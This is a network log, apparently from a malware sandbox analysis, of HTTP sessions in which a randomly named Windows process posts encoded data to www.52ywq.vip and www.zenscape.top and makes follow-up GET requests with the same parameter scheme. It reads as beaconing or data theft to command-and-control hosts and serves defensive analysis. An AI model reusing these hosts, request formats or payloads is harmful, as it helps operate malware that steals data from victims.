Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49743 | 52.187.43.73 | 80 | 600 | C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 05:36:32.435300112 CEST | 741 | OUT | POST /4i87/ HTTP/1.1
                                                      Host: www.52ywq.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.52ywq.vip
                                                      Referer: http://www.52ywq.vip/4i87/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 67 56 64 41 4d 2f 57 70 30 7a 36 78 59 76 4b 38 38 6f 74 34 62 75 31 72 78 70 51 31 61 31 72 52 31 36 7a 30 51 39 6b 52 4c 47 48 66 53 32 48 49 33 48 61 42 32 6a 48 51 44 36 73 45 76 4f 67 55 67 77 4c 52 6c 4c 48 66 62 4c 4a 46 4f 41 65 31 32 75 6a 45 68 74 31 38 6e 6e 31 64 33 59 77 58 63 66 67 73 4d 33 61 30 54 4c 72 56 79 55 63 38 4e 52 73 6b 74 6e 47 42 4e 6a 38 48 59 57 6d 35 47 49 4e 35 4a 62 57 70 57 32 73 63 6a 4b 47 61 56 5a 6e 41 77 65 67 4b 2f 58 49 52 52 73 52 6e 6d 30 6b 54 72 56 46 43 73 74 31 47 7a 2b 77 66 34 35 44 4a 54 74 77 49 71 4d 6e 72 4b 77 52 6c 71 73 4f 39 71 62 68 67 4f 67 53 39 2f 36 6a 4a 52 44 72 57 69 64 49 3d
                                                      Data Ascii: N0spilI0=gVdAM/Wp0z6xYvK88ot4bu1rxpQ1a1rR16z0Q9kRLGHfS2HI3HaB2jHQD6sEvOgUgwLRlLHfbLJFOAe12ujEht18nn1d3YwXcfgsM3a0TLrVyUc8NRsktnGBNj8HYWm5GIN5JbWpW2scjKGaVZnAwegK/XIRRsRnm0kTrVFCst1Gz+wf45DJTtwIqMnrKwRlqsO9qbhgOgS9/6jJRDrWidI=
                                                      Sep 25, 2024 05:36:33.484868050 CEST  359                IN         HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 25 Sep 2024 03:36:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://6329.vhjhbv.com/4i87/
                                                      Server: CDNRay
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      7           192.168.2.4  49744        52.187.43.73    80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp                             Bytes transferred  Direction  Data
                                                      Sep 25, 2024 05:36:34.982815981 CEST  10823              OUT        POST /4i87/ HTTP/1.1
                                                      Host: www.52ywq.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.52ywq.vip
                                                      Referer: http://www.52ywq.vip/4i87/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 67 56 64 41 4d 2f 57 70 30 7a 36 78 59 76 4b 38 38 6f 74 34 62 75 31 72 78 70 51 31 61 31 72 52 31 36 7a 30 51 39 6b 52 4c 47 66 66 53 45 50 49 6c 67 47 42 33 6a 48 51 64 4b 73 46 76 4f 68 4d 67 77 44 56 6c 4c 44 68 62 4e 46 46 63 79 57 31 77 61 50 45 6f 74 31 38 34 33 31 63 71 49 77 6e 63 65 4d 6f 4d 30 69 30 54 4c 72 56 79 56 73 38 65 6a 45 6b 2b 33 47 43 45 44 38 62 63 57 6d 46 47 4a 6c 70 4a 62 54 65 57 47 4d 63 6a 71 57 61 5a 4b 50 41 73 4f 67 49 34 58 49 7a 52 73 64 34 6d 30 49 35 72 57 59 70 73 71 39 47 7a 36 73 41 6c 4d 6a 51 41 4d 6f 41 38 2b 6a 32 4f 51 4e 61 69 66 43 6b 71 4a 73 67 65 68 37 65 37 49 32 5a 46 78 6e 2b 2b 61 71 58 70 67 68 77 39 6c 4d 35 6b 70 58 78 6f 70 47 33 4c 49 4e 77 44 43 4e 63 4e 59 38 2f 56 39 62 2b 2b 34 51 69 6a 4d 2b 64 73 51 55 35 69 59 65 62 52 4d 6d 49 64 30 37 4f 37 63 34 53 58 41 67 6b 41 79 77 30 4a 50 48 61 67 37 50 50 31 79 37 4a 78 7a 67 36 6d 63 63 62 4d 53 54 72 6f 4a 48 53 30 54 54 65 32 79 4c 2b 62 6f 75 63 62 35 79 47 4e [TRUNCATED]
                                                      Data Ascii: N0spilI0= [TRUNCATED]
                                                      Sep 25, 2024 05:36:36.056647062 CEST  359                IN         HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 25 Sep 2024 03:36:35 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://6329.vhjhbv.com/4i87/
                                                      Server: CDNRay
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      8           192.168.2.4  49745        52.187.43.73    80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp                             Bytes transferred  Direction  Data
                                                      Sep 25, 2024 05:36:37.526915073 CEST  467                OUT        GET /4i87/?Vvn=XtJLE6KXyHJ010P&N0spilI0=tX1gPPm4vGDAfdGczrVeX+gm8LhLY0HdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVsboGl1wez7JIRLBvFWiGcrLzlWcfeTA45w8= HTTP/1.1
                                                      Host: www.52ywq.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:36:38.622203112 CEST  509                IN         HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 25 Sep 2024 03:36:38 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://6329.vhjhbv.com/4i87/?Vvn=XtJLE6KXyHJ010P&N0spilI0=tX1gPPm4vGDAfdGczrVeX+gm8LhLY0HdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVsboGl1wez7JIRLBvFWiGcrLzlWcfeTA45w8=
                                                      Server: CDNRay
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      9           192.168.2.4  49746        199.192.21.169  80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp                             Bytes transferred  Direction  Data
                                                      Sep 25, 2024 05:36:43.845462084 CEST  730                OUT        POST /d8cw/ HTTP/1.1
                                                      Host: www.zenscape.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.zenscape.top
                                                      Referer: http://www.zenscape.top/d8cw/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 38 6c 67 47 31 42 6a 63 43 4a 2f 30 33 79 52 48 7a 37 49 37 47 45 6a 6b 4f 2f 32 2b 4b 4e 39 47 7a 68 71 31 41 64 6f 30 39 56 42 71 56 62 38 54 73 65 67 61 63 57 54 54 72 52 73 74 78 4f 6e 4d 6b 58 43 33 69 59 72 70 6c 71 4a 79 71 71 69 75 65 78 2b 6c 44 30 57 41 54 48 31 52 33 62 70 58 4a 39 57 58 50 64 6a 65 67 44 66 6e 4d 33 50 36 49 6e 48 41 45 43 6f 62 7a 68 70 55 73 48 6e 75 67 58 6b 54 50 49 36 7a 44 7a 52 50 2b 6a 64 68 46 2f 38 31 61 45 4e 78 38 41 37 4d 30 30 54 77 6f 61 33 79 54 2b 4d 77 54 4e 41 52 58 78 42 6e 7a 2f 48 6e 77 3d 3d
                                                      Data Ascii: N0spilI0=/itW34sb01LlH8lgG1BjcCJ/03yRHz7I7GEjkO/2+KN9Gzhq1Ado09VBqVb8TsegacWTTrRstxOnMkXC3iYrplqJyqqiuex+lD0WATH1R3bpXJ9WXPdjegDfnM3P6InHAECobzhpUsHnugXkTPI6zDzRP+jdhF/81aENx8A7M00Twoa3yT+MwTNARXxBnz/Hnw==
                                                      Sep 25, 2024 05:36:44.452625036 CEST  980                IN         HTTP/1.1 404 Not Found
                                                      Date: Wed, 25 Sep 2024 03:36:44 GMT
                                                      Server: Apache
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Length: 774
                                                      X-XSS-Protection: 1; mode=block
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      10          192.168.2.4  49747        199.192.21.169  80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp                             Bytes transferred  Direction  Data
                                                      Sep 25, 2024 05:36:46.388969898 CEST  750                OUT        POST /d8cw/ HTTP/1.1
                                                      Host: www.zenscape.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.zenscape.top
                                                      Referer: http://www.zenscape.top/d8cw/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 66 74 67 41 6d 35 6a 4c 79 4a 38 33 33 79 52 4e 54 37 45 37 47 49 6a 6b 4c 66 6d 72 6f 70 39 47 58 6c 71 6e 52 64 6f 33 39 56 42 6c 31 62 35 58 73 65 76 61 63 71 62 54 75 70 73 74 78 61 6e 4d 68 72 43 33 78 67 6f 6f 31 71 50 37 4b 71 67 78 75 78 2b 6c 44 30 57 41 54 53 51 52 33 7a 70 55 35 4e 57 57 75 64 73 43 77 44 63 33 73 33 50 78 6f 6e 44 41 45 43 65 62 32 46 44 55 75 76 6e 75 6c 7a 6b 64 2b 49 35 35 44 7a 66 46 65 69 6a 6b 48 66 79 30 6f 78 64 77 75 78 61 53 41 41 76 38 4f 4c 74 6a 69 66 62 69 54 70 7a 4d 51 34 31 71 77 43 4f 38 34 63 57 74 75 53 64 54 78 77 73 74 37 54 4b 65 73 57 37 46 39 34 3d
                                                      Data Ascii: N0spilI0=/itW34sb01LlHftgAm5jLyJ833yRNT7E7GIjkLfmrop9GXlqnRdo39VBl1b5XsevacqbTupstxanMhrC3xgoo1qP7Kqgxux+lD0WATSQR3zpU5NWWudsCwDc3s3PxonDAECeb2FDUuvnulzkd+I55DzfFeijkHfy0oxdwuxaSAAv8OLtjifbiTpzMQ41qwCO84cWtuSdTxwst7TKesW7F94=
                                                      Sep 25, 2024 05:36:46.967294931 CEST  980                IN         HTTP/1.1 404 Not Found
                                                      Date: Wed, 25 Sep 2024 03:36:46 GMT
                                                      Server: Apache
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Length: 774
                                                      X-XSS-Protection: 1; mode=block
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      11          192.168.2.4  49748        199.192.21.169  80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp                             Bytes transferred  Direction  Data
                                                      Sep 25, 2024 05:36:48.936655045 CEST  10832              OUT        POST /d8cw/ HTTP/1.1
                                                      Host: www.zenscape.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.zenscape.top
                                                      Referer: http://www.zenscape.top/d8cw/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 66 74 67 41 6d 35 6a 4c 79 4a 38 33 33 79 52 4e 54 37 45 37 47 49 6a 6b 4c 66 6d 72 6f 68 39 46 6b 39 71 31 69 46 6f 34 64 56 42 73 56 62 34 58 73 65 32 61 63 79 6c 54 76 55 5a 74 33 57 6e 44 6a 54 43 67 51 67 6f 69 31 71 50 32 71 71 74 75 65 78 52 6c 44 6b 53 41 54 43 51 52 33 7a 70 55 37 56 57 41 50 64 73 41 77 44 66 6e 4d 32 4f 36 49 6e 6e 41 45 36 4f 62 33 45 30 58 66 50 6e 75 46 6a 6b 66 4d 67 35 78 44 7a 64 43 65 69 72 6b 48 53 77 30 6f 74 52 77 75 6f 50 53 48 6f 76 32 4c 4b 53 37 44 7a 54 31 79 35 51 54 51 63 6d 79 52 71 30 32 4a 4d 63 71 38 4b 37 4e 46 6f 43 75 72 47 59 43 75 36 42 61 64 39 51 41 41 67 37 54 4e 52 71 62 39 4b 47 6e 62 50 68 59 6c 76 64 67 38 47 54 42 78 38 5a 56 52 76 37 7a 30 79 54 69 69 32 48 53 45 46 45 75 71 58 6b 62 37 56 70 6c 77 4e 74 6b 76 4c 2b 48 6a 52 4b 36 4c 70 76 6a 51 56 30 70 74 54 48 42 5a 42 45 43 5a 79 59 70 4d 4d 39 53 31 51 39 71 4e 33 4d 6b 4f 63 41 63 32 2b 54 56 72 58 37 49 76 36 41 74 [TRUNCATED]
                                                      Data Ascii: N0spilI0=/itW34sb01LlHftgAm5jLyJ833yRNT7E7GIjkLfmroh9Fk9q1iFo4dVBsVb4Xse2acylTvUZt3WnDjTCgQgoi1qP2qqtuexRlDkSATCQR3zpU7VWAPdsAwDfnM2O6InnAE6Ob3E0XfPnuFjkfMg5xDzdCeirkHSw0otRwuoPSHov2LKS7DzT1y5QTQcmyRq02JMcq8K7NFoCurGYCu6Bad9QAAg7TNRqb9KGnbPhYlvdg8GTBx8ZVRv7z0yTii2HSEFEuqXkb7VplwNtkvL+HjRK6LpvjQV0ptTHBZBECZyYpMM9S1Q9qN3MkOcAc2+TVrX7Iv6AtKsEImsQtglOJjbaNYn28+/W0IeJrG38w6VhrPfY4SAI8D0dH1fzwzUASpwak9dKQ1MkBrcRCkb4tL7NcMnC9YAe0T15Bx74iKVoIREzgqT9LZ8uIqwJfsApv8z6MXqgjePNbjZvhQaHegNgpplpOjOUYtcxkv5qVXIY8nuPLwDzT7iexRfsuy6+MNlvNSH85zjgD9WJIf5UFswIUd7kezColGkJLGwtRJJh/e+CGc4969dW0XrLx79vUcrNxMXXHYdTFex09p9gWrBJyx8Qm5e2M6JHkg69XSY78Ves/26N4+Xh6pUF9ZfUlHIOCS1aR5sgDucO4NYxqTv7pxN2Ag0qg+noD1p8DtXTmPglgr3wLaWAWD7sPTcpUY+mj8n2T0sVM7zIr/al/QDcM8cIVoiHBoV9NKgzJKq3HlmUsvOYoNdEPXyMEnh3knCKAwCUXtMD8MUhF2SVGyhkpCcCdpVEMSxS5mbLsiX1xE77sM7l/f1MFLtbUqrNRT/YywvpE1wWlAwRx17osSxcPmVuuKd8PVbkQeE5Fn4n2gMiHCQxcyIpKOnfhTzuvePnexueUmtLH5VV2FJ9508C0O5sbRlyqegMj00sa6l9oS7PSLzqqliAASAJcHU5e+uRey69gsQRzaf/ychMY/kZ01UweQ9CnYsQNHqJAsj [TRUNCATED]
                                                      Sep 25, 2024 05:36:49.520350933 CEST  980                IN         HTTP/1.1 404 Not Found
                                                      Date: Wed, 25 Sep 2024 03:36:49 GMT
                                                      Server: Apache
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Length: 774
                                                      X-XSS-Protection: 1; mode=block
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                      12          192.168.2.4  49749        199.192.21.169  80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
                                                      Timestamp                             Bytes transferred  Direction  Data
                                                      Sep 25, 2024 05:36:51.484142065 CEST  470                OUT        GET /d8cw/?N0spilI0=ygF20N1+ik7kBOtGb3g4TwN9wkqIIRiR8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5ookWv7InHpo4AkD1QDiauZEraAIYQUMRDKnI=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.zenscape.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Sep 25, 2024 05:36:52.085654974 CEST  995                IN         HTTP/1.1 404 Not Found
                                                      Date: Wed, 25 Sep 2024 03:36:51 GMT
                                                      Server: Apache
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Length: 774
                                                      X-XSS-Protection: 1; mode=block
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8
